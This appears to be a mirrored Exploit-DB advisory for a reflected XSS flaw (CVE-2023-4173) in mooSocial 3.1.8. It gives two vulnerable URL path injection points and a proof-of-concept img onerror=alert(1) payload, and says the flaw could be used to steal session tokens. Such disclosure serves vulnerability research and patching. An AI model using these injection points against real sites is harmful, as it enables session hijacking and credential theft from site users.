mooSocial 3.1.8 – Reflected XSS

  • 作者: CraCkEr
    日期: 2023-08-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51670/
  • # Exploit Title: mooSocial 3.1.8 - Reflected XSS
    # Exploit Author: CraCkEr
    # Date: 28/07/2023
    # Vendor: mooSocial
    # Vendor Homepage: https://moosocial.com/
    # Software Link: https://travel.moosocial.com/
    # Version: 3.1.8
    # Tested on: Windows 10 Pro
    # Impact: Manipulate the content of the site
    # CVE: CVE-2023-4173
    
    
    ## Greetings
    
    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
    CryptoJob (Twitter) twitter.com/0x0CryptoJob
    
    
    ## Description
    
    The attacker can send to victim a link containing a malicious URL in an email or instant message
    can perform a wide variety of actions, such as stealing the victim's session token or login credentials
    
    
    
    URL path folder is vulnerable to XSS
    
    https://website/classifieds[XSS]/search?category=1
    
    https://website/classifieds/search[XSS]?category=1
    
    
    XSS Payloads:
    
    ijz3y"><img src=a onerror=alert(1)>y4apk
    
    
    [-] Done